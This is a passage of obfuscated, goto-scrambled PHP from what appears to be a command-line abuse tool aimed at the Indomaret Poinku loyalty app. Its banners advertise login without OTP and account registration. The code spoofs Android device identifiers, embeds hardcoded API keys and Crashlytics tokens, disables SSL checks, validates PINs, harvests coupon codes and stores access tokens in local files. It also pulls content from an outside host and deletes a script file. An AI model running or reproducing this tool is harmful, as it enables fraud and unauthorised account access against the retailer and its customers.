  if (!($zn5zd == $rVPVc)) { 
    goto NhM90; 
  } 
  goto QIBEy; 
  SaVD_: 
  print_r($zcN5u); 
  goto x0V_6; 
  qH6lQ: 
  echo @Zm6iC("yellow", "Pesan       : "); 
  goto OhQV5; 
  sHcge: 
  $f5jPx = json_decode($Ia9Ix, true); 
  goto hJjFO; 
  bnog9: 
  echo @ZM6Ic("red", "Notice : "); 
  goto VlP2H; 
  p6pym: 
  echo @zM6iC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto CmfSI; 
  mTXKJ: 
  echo @zm6ic("nevy", "        AAMIIN "); 
  goto ee12d; 
  IMPoy: 
  echo @Zm6iC("red", $qtgR3); 
  goto zxj7y; 
  PbA2u: 
  $YYbml = @$H1g60["authToken"]["token"]; 
  goto RJm53; 
  jBx5X: 
  $Jk9cx = g8PF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/is-whatsapp-verified", $aY0el, $GOXkU, $mlMLt); 
  goto O_aCK; 
  tYb9o: 
  echo "\xa"; 
  goto lhclc; 
  LihqS: 
  echo @Zm6Ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto DcdsX; 
  kT9ly: 
  piuRU: 
  goto zxVpE; 
  fmZo2: 
  echo "\xa"; 
  goto CCLK7; 
  uHHvj: 
  aCWFZ: 
  goto EJmp3; 
  eryO5: 
  echo $jTEU0; 
  goto Sxaeu; 
  sBlfA: 
  $BcbF3 = @$Ap1KM["data"]["phoneNumber"]; 
  goto UPPZ2; 
  sYQLH: 
  echo "\xa"; 
  goto tVubp; 
  sNpwz: 
  $SpzvW = g66lt("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/validate-pin", $wDisp, $aY0el); 
  goto BqG2a; 
  bnBRa: 
  function qKr9F($FK_yc, $bQedf, $p5fm4, $Y33LL) 
  { 
    goto dRsKM; 
    M_JVb: 
    fclose($FhLCi); 
    goto m0JrM; 
    Mxoky: 
    fputs($FhLCi, "{$bQedf} = {$p5fm4} = {$Y33LL}\xa"); 
    goto M_JVb; 
    dRsKM: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto Mxoky; 
    m0JrM: 
  } 
  goto eWqTD; 
  XQRKG: 
  Hw2pH: 
  goto qIS9E; 
  TKtco: 
  echo @ZM6Ic("yellow", "Nama Kota   : "); 
  goto sYy6d; 
  CAqX2: 
  function t8s2Z($lEbop, $wDisp = null, $eOlDi, $tj7_x) 
  { 
    goto NgnQa; 
    iwN9r: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto FEHs1; 
    cMX0s: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto k_xxi; 
    u3uaM: 
    $ECuqv = curl_exec($C6npe); 
    goto iwN9r; 
    E07xh: 
    $ruc3h[] = "{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $tj7_x . "","device_id":"" . $eOlDi . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto ldtjp; 
    pc8Gf: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto AVCcJ; 
    tWFWS: 
    print_r($AXlcQ); 
    goto NFbeD; 
    uHwib: 
    $ruc3h[] = "Host: edtsapp.indomaretpoinku.com"; 
    goto e9kZ_; 
    NgnQa: 
    $C6npe = curl_init(); 
    goto Fufbn; 
    gIRcP: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto Wk1Ca; 
    AVCcJ: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto uM0Ik; 
    uNmvu: 
    $AXlcQ = json_decode($y7f11, true); 
    goto tWFWS; 
    FEHs1: 
    if (!$P7lm9) { 
      goto Vhd8h; 
    } 
    goto MEBWv; 
    ccUvF: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto bg97u; 
    bg97u: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto KIU3_; 
    Zu1Pt: 
    return false; 
    goto Cz69w; 
    ldtjp: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto pc8Gf; 
    Cz69w: 
    T9llq: 
    goto uNmvu; 
    KIU3_: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto gIRcP; 
    e9kZ_: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto cGxrw; 
    k_xxi: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto u3uaM; 
    uM0Ik: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto cMX0s; 
    lxEuu: 
    Vhd8h: 
    goto Zu1Pt; 
    Jtxpv: 
    goto T9llq; 
    goto lxEuu; 
    Wk1Ca: 
    $ruc3h[] = "accept-encoding: gzip"; 
    goto uHwib; 
    cGxrw: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto E07xh; 
    MEBWv: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto xFaEb; 
    NFbeD: 
    return $ECuqv; 
    goto QSCbo; 
    xFaEb: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto Jtxpv; 
    Fufbn: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto ccUvF; 
    QSCbo: 
  } 
  goto GgRFr; 
  VGfv_: 
  echo shell_exec("xdg-open "https://barcode.tec-it.com/barcode.ashx?data="" . $p4iky . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto kJkzB; 
  eT4LJ: 
  eyO14: 
  goto oujxp; 
  i5Kia: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto xMSWM; 
  jlEpj: 
  $a7K8a = jLw7P("https://firebaseinstallations.googleapis.com/v1/projects/idm-corp-prd/installations", $wDisp); 
  goto NO6kH; 
  chPVV: 
  $R_bYC = @$nPb0z["data"]["id"]; 
  goto eu_9w; 
  ZbVXq: 
  Js11p: 
  goto kS9F0; 
  TOHQ1: 
  echo "
"; 
  goto mL6ay; 
  F0uMw: 
  $Jk9cx = G8PF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/is-whatsapp-verified", $aY0el, $GOXkU, $mlMLt); 
  goto tRe9c; 
  SVrQX: 
  echo "Sampai Baris Ke : "; 
  goto Qj0f7; 
  E0app: 
  echo @ZM6iC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto oqhQc; 
  qOgWC: 
  goto yj7_K; 
  goto yvEV4; 
  sjkH3: 
  lqjr6("mytoken", $zn5zd, $mlMLt); 
  goto Hzhxt; 
  wS3V9: 
  $QRhbE = explode("
", @file_get_contents("mytoken")); 
  goto AAZZf; 
  FA82m: 
  echo @ZM6Ic("green", $wd9cN); 
  goto oR8Sv; 
  KuMZj: 
  echo @ZM6iC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto paChL; 
  LH0vW: 
  echo @zM6ic("nevy", " | Script IDM LOGIN POINKU TANPA OTP
"); 
  goto LRQ9s; 
  ifSLw: 
  $efQM2 = count($QRhbE) - 1; 
  goto DU2ia; 
  ZCjtF: 
  $Q8u1Y = @$lImQC["data"]["content"][13]["couponCode"]; 
  goto CzdBB; 
  w38wp: 
  $wDisp = "{"phoneNumber":"" . $zn5zd . "","deviceId":"" . $aY0el . ""}"; 
  goto p6p07; 
  Wn0sH: 
  t5ME1: 
  goto Q_oJ7; 
  gzViQ: 
  if (!($jTEU0 < $S8W9D)) { 
    goto nn5qa; 
  } 
  goto hh5Bb; 
  MNFa0: 
  MSwAP: 
  goto b1o_O; 
  Lw5kj: 
  $zcN5u = xoZB4(array("\xa"), $tqWr2)[$jTEU0]; 
  goto LevEA; 
  d1XlT: 
  echo @zm6IC("green", "Nomor HP Anda : "); 
  goto RO2UM; 
  hzy5a: 
  $yy9BI = "0"; 
  goto kJKzo; 
  Vca23: 
  echo @zM6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto ja9Xm; 
  wk8VN: 
  echo @zm6iC("yellow", "Nomor Penerima : "); 
  goto GdJUg; 
  BFumN: 
  echo "\xa"; 
  goto j2aPY; 
  pT_BP: 
  $zn5zd = $U0YgX; 
  goto FMSSY; 
  EUIiI: 
  echo "
"; 
  goto l9zj0; 
  LijEy: 
  CVvEu: 
  goto Gfs_c; 
  G_1Lo: 
  echo @Zm6Ic("yellow", "Nama Kuponnya    : "); 
  goto mDkhk; 
  mM1Qy: 
  $yy9BI = "0"; 
  goto rYruL; 
  k14Mn: 
  @unlink("poinhp.php"); 
  goto f0C6o; 
  Mk08D: 
  $RJnNP = trim(fgets(STDIN)); 
  goto u44Up; 
  DjD3h: 
  $D18xv = @$H1g60["data"]["id"]; 
  goto tLkkX; 
  we6J2: 
  V36mw: 
  goto VtmJu; 
  ZiXgl: 
  $C04ya = curl_error($C6npe); 
  goto q3mFb; 
  bRraB: 
  echo "
"; 
  goto u2o7b; 
  iLHhK: 
  $iElqk = G1Wxt("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/is-pin-exist-by-phone-number", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto nAcOm; 
  KEsk1: 
  tZ3WW: 
  goto VXnb2; 
  XMS9r: 
  if (!($jTEU0 < $S8W9D)) { 
    goto BOYRi; 
  } 
  goto gNu5p; 
  F2SO3: 
  $IKJzx = array(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/ppp")); 
  goto Yj7KY; 
  cfMHq: 
  echo "\xa"; 
  goto RS0jB; 
  MY65q: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto sBlfA; 
  cDMKA: 
  UQIJ5: 
  goto syYB4; 
  AWPnd: 
  echo "\xa"; 
  goto U8SH2; 
  EMbAe: 
  $D2zwh = "0"; 
  goto Q3ZMp; 
  TjTjD: 
  $DxrJr = "100000000000000000"; 
  goto uGUIH; 
  qIS9E: 
  RhrIJ("Kupon Poinku new.txt", $QFiev); 
  goto C81Xy; 
  HikpN: 
  if (!($cPDPt == 12)) { 
    goto TLXym; 
  } 
  goto Cq7zJ; 
  ZMq7C: 
  echo "\xa"; 
  goto LCrgv; 
  KSFIU: 
  echo "
"; 
  goto ktiz3; 
  ELOq3: 
  rHN94: 
  goto bsKnA; 
  n7HcN: 
  echo "Sampai Baris Ke : "; 
  goto TvO3v; 
  Epd7E: 
  $v1ZMX = str_replace("
", '', $wPFxB); 
  goto VGfok; 
  fDZVQ: 
  if (!($fUekS == '')) { 
    goto ihbeD; 
  } 
  goto GuIir; 
  f0kag: 
  echo @Zm6ic("nevy", $ldzeo); 
  goto AEHyE; 
  SI53_: 
  if (!($ABmxY == "Kode Verifikasi yang kamu masukan salah.")) { 
    goto FnQw9; 
  } 
  goto MOApc; 
  FgEJz: 
  @unlink("poinhp.php"); 
  goto sE3lv; 
  yOKeR: 
  $Jk9cx = G8PF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto W5OtU; 
  w_Cs4: 
  $u35jw = count($m0f8X) - 1; 
  goto pa3zD; 
  HqWju: 
  function lQJR6($FK_yc, $zn5zd, $mlMLt) 
  { 
    goto TY2c8; 
    KrV_L: 
    fputs($FhLCi, "{$zn5zd}|{$mlMLt}\xa"); 
    goto YORzy; 
    TY2c8: 
    $FhLCi = fopen($FK_yc, "a"); 
    goto KrV_L; 
    YORzy: 
    fclose($FhLCi); 
    goto IJvZV; 
    IJvZV: 
  } 
  goto oow_c; 
  AQXMs: 
  echo @zM6ic("yellow", "Nama Kuponnya    : "); 
  goto rP8OU; 
  P5yoE: 
  $Jk9cx = g8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/is-whatsapp-verified", $aY0el, $GOXkU, $mlMLt); 
  goto j3Ixl; 
  Xv3BQ: 
  echo @zm6iC("yellow", "Nama Kuponnya    : "); 
  goto yvqsu; 
  jLvP7: 
  I1Quu: 
  goto soKJc; 
  fDgG7: 
  echo @zm6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto WdaDw; 
  PqKxD: 
  $upOL9 = g8pF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/points/me/coupons?page=0&sort=amount%2Casc&sort=name%2Casc&size=1000", $aY0el, $GOXkU, $mlMLt); 
  goto d802g; 
  yibUd: 
  if (!($ABmxY == "Kode Verifikasi yang kamu masukan salah.")) { 
    goto QWuXy; 
  } 
  goto eQwBm; 
  XYMLf: 
  if (!($jTEU0 < $S8W9D)) { 
    goto ADNin; 
  } 
  goto n_ddg; 
  aZIpz: 
  echo "Mulai Baris Ke : "; 
  goto Mws1Z; 
  B_JBr: 
  goto CjBGa; 
  goto ai408; 
  SnZeB: 
  rhRij("Kupon Poinku new.txt", $gwQ0n); 
  goto I58TZ; 
  ZoliY: 
  print_r($zcN5u); 
  goto OWKNy; 
  SFpTg: 
  $efQM2 = count($QRhbE) - 1; 
  goto kMDXZ; 
  Xl42B: 
  $yy9BI = "0"; 
  goto mZygY; 
  OqLtw: 
  echo @zM6IC("green", "Nomor HP Anda : "); 
  goto qkqcs; 
  uUFQx: 
  MxwyD: 
  goto HC4Z1; 
  If3cN: 
  function Br93Z($lEbop, $wDisp = null) 
  { 
    goto CcCmO; 
    zzRKD: 
    $ECuqv = curl_exec($C6npe); 
    goto Y8yRk; 
    U31t7: 
    $ruc3h[] = "Host: asia-southeast2-idm-corp-prd.cloudfunctions.net"; 
    goto tetnG; 
    y0LSY: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto NuRWH; 
    HIcnw: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto BLmdy; 
    tetnG: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto PAaD_; 
    tM0sV: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto HIcnw; 
    g_VXt: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto tM0sV; 
    F9gYj: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto y0LSY; 
    NuRWH: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto R4T3k; 
    jm78m: 
    l9Hlb: 
    goto uHVLy; 
    BLmdy: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto zh6Vx; 
    R4T3k: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto zzRKD; 
    k3qPS: 
    if (!$P7lm9) { 
      goto l9Hlb; 
    } 
    goto ZZbtD; 
    k3glQ: 
    $AXlcQ = json_decode($y7f11, true); 
    goto IkRwM; 
    PAaD_: 
    $ruc3h[] = "authorization: NNKSkTdooQo7vUGVG5eGkgYSVW7SabSjffafao35nfoan3ygfaa"; 
    goto cbjwU; 
    V2HLk: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto NRaLO; 
    zh6Vx: 
    $ruc3h[] = "accept-encoding: gzip"; 
    goto U31t7; 
    utqNN: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto g_VXt; 
    Y8yRk: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto k3qPS; 
    uHVLy: 
    return false; 
    goto wJO7L; 
    AVch1: 
    return $ECuqv; 
    goto OpjCm; 
    cbjwU: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto wdfO1; 
    IkRwM: 
    print_r($AXlcQ); 
    goto AVch1; 
    wJO7L: 
    xAeZA: 
    goto k3glQ; 
    CcCmO: 
    $C6npe = curl_init(); 
    goto utqNN; 
    ZZbtD: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto V2HLk; 
    NRaLO: 
    goto xAeZA; 
    goto jm78m; 
    wdfO1: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto F9gYj; 
    OpjCm: 
  } 
  goto fGnXq; 
  R30MJ: 
  B_12r: 
  goto lUgya; 
  BFRXN: 
  echo $BcbF3; 
  goto nWNE3; 
  PTWfM: 
  echo "\xa"; 
  goto tXZim; 
  AY5hr: 
  $JaDCq = $PQA77; 
  goto jhRqg; 
  ZsgDH: 
  RZv4q: 
  goto uBAdz; 
  ZiZaH: 
  $efQM2 = count($QRhbE) - 1; 
  goto FZc3k; 
  jfh1u: 
  echo @zm6ic("yellow", "Status Pecahin Ayam : "); 
  goto lxpuD; 
  Fb74W: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_label":"login","event_name":"event_submission","event_status":"success","event_timestamp":" . $nb9cm . "},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto gSmff; 
  yvEV4: 
  NNMbo: 
  goto vx1TV; 
  NYvnF: 
  echo "
"; 
  goto Cbxgb; 
  W3rdR: 
  nB5sV: 
  goto ioDGw; 
  fPDTC: 
  $yJiD4 = @$owfHy["data"][$dQ8Tp]["districtName"]; 
  goto ODdXV; 
  QIBEy: 
  if ($rVPVc == '') { 
    goto tVK8J; 
  } 
  goto uTH7V; 
  usfrB: 
  echo "\xa"; 
  goto dJ2RH; 
  o6YWQ: 
  goto GV2ko; 
  goto XQRKG; 
  o0dYP: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto qYGDe; 
  s2xDv: 
  echo "\xa"; 
  goto m1FX4; 
  vtZNG: 
  sleep(5); 
  goto mHLe6; 
  F_w9s: 
  $AxbWA = xWL4L(); 
  goto rX_9S; 
  s9534: 
  echo "
"; 
  goto M10jD; 
  gPucm: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto n_WdW; 
  f9R6b: 
  $kp_uF = @$nPb0z["data"]["isNewRegister"]; 
  goto OO8Xp; 
  hijh7: 
  SXxFu: 
  goto jgBkc; 
  RY_tp: 
  echo "\xa"; 
  goto bY0qY; 
  U7gXf: 
  $efQM2 = count($QRhbE) - 1; 
  goto Znx5G; 
  wo9IC: 
  $zvt88 = $QRhbE; 
  goto dSUW6; 
  rP8OU: 
  echo @zm6IC("nevy", $ZNU2M); 
  goto tYb9o; 
  PZVdK: 
  echo @zM6iC("nevy", " | Script IDM REGISTER POINKU
"); 
  goto Ls8hJ; 
  padaL: 
  mXaLJ: 
  goto IBHxa; 
  Zi5Xi: 
  $D2zwh++; 
  goto HqqQS; 
  Gj86c: 
  $t4wQX = @$lImQC["data"]["content"][12]["couponName"]; 
  goto DyuhB; 
  a_Crt: 
  echo @ZM6ic("yellow", "Mulai Penukaran : "); 
  goto At2qS; 
  Mz5t0: 
  echo @Zm6IC("nevy", $b2ucB); 
  goto O3LwN; 
  jMYW0: 
  echo "
"; 
  goto cd3Bo; 
  CSUr1: 
  $cod3H = fq6W0(); 
  goto jE9nl; 
  cQJu1: 
  $m5BZY = ggGr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto tJibk; 
  j2aPY: 
  $yy9BI = "0"; 
  goto ZMq7C; 
  GiiQv: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"details":{"isaku_status":"Hubungkan"},"event_name":"page_detail","event_timestamp":" . $nb9cm . ","page_name":"isaku"},"marketing":{"utm_raw":"utm_source=google-play&utm_medium=organic"},"user":{"session_id":"" . $MXjqh . "","user_id":" . $R_bYC . ","user_ip_address":"127.0.0.1"}}]}"; 
  goto BvCfg; 
  VaxP_: 
  echo "\xa"; 
  goto JrA1b; 
  uNK1N: 
  $nb9cm = round(microtime(true) * 1000); 
  goto N0fHh; 
  nE0JD: 
  sleep(2); 
  goto o1wNp; 
  vaDzD: 
  $mlMLt = @$owfHy["data"]["access_token"]; 
  goto W_0f1; 
  B7_L8: 
  $I2tFV = @$owfHy["data"]["content"][$D2zwh]["amount"]; 
  goto WiRh7; 
  NPalc: 
  $qaGLY = str_replace("-", '', $AxbWA); 
  goto wlKpJ; 
  mdOEh: 
  xjSqb: 
  goto eFdhA; 
  yAXnQ: 
  echo "
"; 
  goto RERXA; 
  Q87m9: 
  echo @zM6iC("nevy", $SR3ui); 
  goto MXmci; 
  xQq0X: 
  YUYuF: 
  goto BjSHt; 
  swve1: 
  echo "
"; 
  goto ImlhV; 
  IgsmW: 
  $lPULW = $m0f8X; 
  goto Y4wH0; 
  ft7vH: 
  q9_1d: 
  goto syrF8; 
  PNvRG: 
  if (!($D2zwh < $ogbF4)) { 
    goto y1Iam; 
  } 
  goto VZdN4; 
  DU2ia: 
  $zvt88 = $QRhbE; 
  goto Y4tmI; 
  uG5i5: 
  echo $v9NcH; 
  goto lzit9; 
  a8A3B: 
  goto VVlAK; 
  goto hJ8Yw; 
  zowCb: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto wdlw0; 
  fumDL: 
  @unlink("poinhp.php"); 
  goto Ssnqn; 
  WWbCv: 
  qf4ti: 
  goto YzXDq; 
  sGyE9: 
  echo @zm6iC("yellow", "Nama Kelurahan : "); 
  goto f0kag; 
  RdPLe: 
  echo "Error deleting {$xp_1p} "; 
  goto SoiZ3; 
  HFPOn: 
  echo "Mulai Baris Ke : "; 
  goto buUjn; 
  VdRrs: 
  $m5BZY = Gggr_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto bSVki; 
  wuvlF: 
  echo @Zm6IC("yellow", "Pesan : "); 
  goto To2Qr; 
  P07mA: 
  echo "\xa"; 
  goto NGTs5; 
  XHDw3: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto O5Ks7; 
  NreZy: 
  echo @zm6IC("yellow", "SCAN BARCODE INI AGAR KASIR LEBIH MUDAH.."); 
  goto VGfv_; 
  aa4PH: 
  echo $jTEU0; 
  goto wHw05; 
  Ndfha: 
  goto nNgh2; 
  goto qBG1z; 
  BoJhr: 
  $XTuz1 = G1WxT("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/gift/redeem", $wDisp, $aY0el, $GOXkU, $mlMLt); 
  goto QTf4t; 
  W3YD7: 
  $nb9cm = round(microtime(true) * 1000); 
  goto nlTa3; 
  HVusa: 
  RBkow: 
  goto k7huS; 
  wabM5: 
  $m5BZY = gGgR_("https://asia-southeast2-idm-corp-prd.cloudfunctions.net/idmapps_tracker_gateway", $wDisp); 
  goto U17fx; 
  tUsG6: 
  rhRIJ("Kupon Poinku new.txt", $f2A4u); 
  goto q9l5G; 
  Q3ZMp: 
  $ogbF4 = "30"; 
  goto hBlw0; 
  CNwmE: 
  $efQM2 = count($QRhbE) - 1; 
  goto RixsK; 
  G7Qw6: 
  die; 
  goto gQD3z; 
  UslVr: 
  function K8kY7($lEbop, $aY0el, $GOXkU, $vDxFA) 
  { 
    goto rwnfc; 
    IDHGR: 
    $ruc3h[] = "authorization: Bearer " . $vDxFA; 
    goto Gr_LY; 
    hJZUA: 
    print_r($AXlcQ); 
    goto WubET; 
    Gr_LY: 
    $ruc3h[] = "Host: edtsapp.indomaretpoinku.com"; 
    goto a3hGz; 
    ISnMq: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto IDHGR; 
    LSIB1: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto EJpOf; 
    StumP: 
    goto DRciG; 
    goto xy8ij; 
    XOVd1: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto b3TeN; 
    ae9if: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto YhwlO; 
    iup38: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto qI01W; 
    T7F8p: 
    $ECuqv = curl_exec($C6npe); 
    goto iup38; 
    WubET: 
    return $ECuqv; 
    goto kH8ZF; 
    qI01W: 
    if (!$P7lm9) { 
      goto Tw34E; 
    } 
    goto UUAgD; 
    YhwlO: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto PMU6h; 
    rwnfc: 
    $C6npe = curl_init(); 
    goto ae9if; 
    a3hGz: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto U4dES; 
    U4dES: 
    $ruc3h[] = "{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto s_fgE; 
    UUAgD: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto Igfu6; 
    EJpOf: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto XOVd1; 
    aouE0: 
    return false; 
    goto jsIIZ; 
    xy8ij: 
    Tw34E: 
    goto aouE0; 
    s_fgE: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto LSIB1; 
    PMU6h: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto ISnMq; 
    GCevm: 
    $AXlcQ = json_decode($y7f11, true); 
    goto hJZUA; 
    jsIIZ: 
    DRciG: 
    goto GCevm; 
    b3TeN: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto T7F8p; 
    Igfu6: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto StumP; 
    kH8ZF: 
  } 
  goto qpb4_; 
  kWWNA: 
  EBuCw: 
  goto cJ3ec; 
  jwtdn: 
  function E6TPN($lEbop, $aY0el) 
  { 
    goto iCdFg; 
    pPPRx: 
    $ECuqv = curl_exec($C6npe); 
    goto xt3hf; 
    QG6X9: 
    $ruc3h[] = "X-CRASHLYTICS-DEVELOPER-TOKEN: 470fa2b4ae81cd56ecbcda9735805454cec591fa"; 
    goto r63ZU; 
    I33Ck: 
    dIgMJ: 
    goto SLKmp; 
    IOsOL: 
    $ruc3h[] = "X-CRASHLYTICS-API-CLIENT-TYPE: android"; 
    goto jE_WW; 
    qXnFm: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto qjnG8; 
    M46Dl: 
    $AXlcQ = json_decode($y7f11, true); 
    goto ODPxl; 
    ODPxl: 
    print_r($AXlcQ); 
    goto dhvsu; 
    G10Km: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto yhCYW; 
    dr3dp: 
    $ruc3h[] = "X-CRASHLYTICS-INSTALLATION-ID: 2b4424fb6d20463ea3eb3bc5f953e671"; 
    goto kXvwC; 
    MmZRu: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto zbqnf; 
    s1_ds: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "klik.txt"); 
    goto W9u0P; 
    pK5sp: 
    goto EpXIB; 
    goto I33Ck; 
    xt3hf: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto P1rk3; 
    r63ZU: 
    $ruc3h[] = "X-CRASHLYTICS-DEVICE-MODEL: Xiaomi/Redmi 5 Plus"; 
    goto dr3dp; 
    cbBtB: 
    $ruc3h[] = "X-CRASHLYTICS-API-CLIENT-VERSION: 18.2.4"; 
    goto c17E1; 
    jE_WW: 
    $ruc3h[] = "X-CRASHLYTICS-GOOGLE-APP-ID: 1:998816605328:android:" . $aY0el; 
    goto rMYnl; 
    SLKmp: 
    return false; 
    goto iUCRd; 
    rMYnl: 
    $ruc3h[] = "X-CRASHLYTICS-OS-BUILD-VERSION: eng.rutura.20201127.025802"; 
    goto xjwCB; 
    zbqnf: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto pK5sp; 
    n3EV0: 
    $ruc3h[] = "Accept: application/json"; 
    goto cbBtB; 
    yhCYW: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto ptFhc; 
    W9u0P: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "klik.txt"); 
    goto pPPRx; 
    dhvsu: 
    return $ECuqv; 
    goto GSgbB; 
    qjnG8: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto s1_ds; 
    xjwCB: 
    $ruc3h[] = "Connection: Keep-Alive"; 
    goto d4Azb; 
    c17E1: 
    $ruc3h[] = "User-Agent: Crashlytics Android SDK/18.2.4"; 
    goto IOsOL; 
    iCdFg: 
    $C6npe = curl_init(); 
    goto G10Km; 
    d4Azb: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto qXnFm; 
    ptFhc: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto QG6X9; 
    iUCRd: 
    EpXIB: 
    goto M46Dl; 
    kXvwC: 
    $ruc3h[] = "X-CRASHLYTICS-OS-DISPLAY-VERSION: 9"; 
    goto n3EV0; 
    P1rk3: 
